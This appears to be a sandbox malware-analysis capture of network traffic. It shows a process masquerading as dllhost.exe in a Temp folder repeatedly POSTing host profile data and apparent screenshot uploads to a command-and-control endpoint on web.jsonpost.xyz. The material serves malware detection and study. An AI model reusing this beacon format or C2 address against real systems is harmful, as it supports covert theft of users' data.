                                                                                Nov 29, 2024 01:52:04.581976891 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:04.582056999 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:04.582140923 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:04.701970100 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:04.702052116 CET4944OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:04.702147961 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:04.702147961 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:04.702218056 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:04.820410967 CET6180OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:04.820446014 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.44973172.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:04.582485914 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.44973272.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:06.264380932 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.44973372.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:06.452677965 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:06.452703953 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:06.452795029 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:06.452821016 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:06.572807074 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:06.572859049 CET4944OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:06.572879076 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:06.573009968 CET4944OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:06.573065042 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:52:06.573102951 CET3708OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:52:06.693336010 CET7416OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.44973472.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:07.546147108 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.44973572.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:07.909174919 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:07.909291983 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:07.909410954 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:07.909450054 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:08.029314995 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:08.029454947 CET2472OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:08.029474020 CET2472OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:08.029537916 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:08.029555082 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:08.029644966 CET4944OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:08.029726028 CET3708OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.44973672.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:09.059854984 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.44973772.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:09.438774109 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:09.438805103 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:09.438875914 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:09.438915014 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:09.559099913 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:09.559142113 CET9888OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:09.559156895 CET4944OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
